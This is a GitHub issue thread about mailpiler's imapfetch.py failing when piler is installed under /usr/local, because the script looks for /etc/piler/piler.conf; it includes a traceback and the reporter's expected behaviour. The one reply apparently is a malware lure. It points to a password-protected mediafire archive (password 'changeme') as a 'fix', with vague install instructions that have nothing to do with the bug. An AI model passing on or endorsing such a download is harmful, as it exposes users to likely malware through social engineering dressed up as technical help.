### ISSUE TITLE
[BUG]  /usr/local/libexec/piler/imapfetch.py takes to default /etc/piler/piler.conf

### ISSUE THREAD

**Issue by ediazrod** [jsuto/piler#173]
**Describe the bug**

**To Reproduce**
1. Install mailpiler on /usr/local/
2. Enable on the web interface import mails from file
3. execute /usr/local/libexec/piler/import.sh
### PILEREND
piler@mailarchive2:/var/tmp$ /usr/local/libexec/piler/import.sh
~/imap /var/tmp
~/imap ~/imap
Traceback (most recent call last):
  File "/usr/local/libexec/piler/imapfetch.py", line 230, in <module>
    main()
  File "/usr/local/libexec/piler/imapfetch.py", line 166, in main
    read_options(args.config, opts)
  File "/usr/local/libexec/piler/imapfetch.py", line 25, in read_options
    s = "[piler]\n" + open(filename, 'r').read()
                      ^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/etc/piler/piler.conf'

**Expected behavior**
The process must run on the interface

**Screenshots**
No apply 

**Piler version:**
 - "piler -V" output 1.4.6

**Additional context**
we need that "/usr/local/libexec/piler/imapfetch.py" can take by default /etc/piler/piler.conf OR /usr/local/etc/piler/piler.conf

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
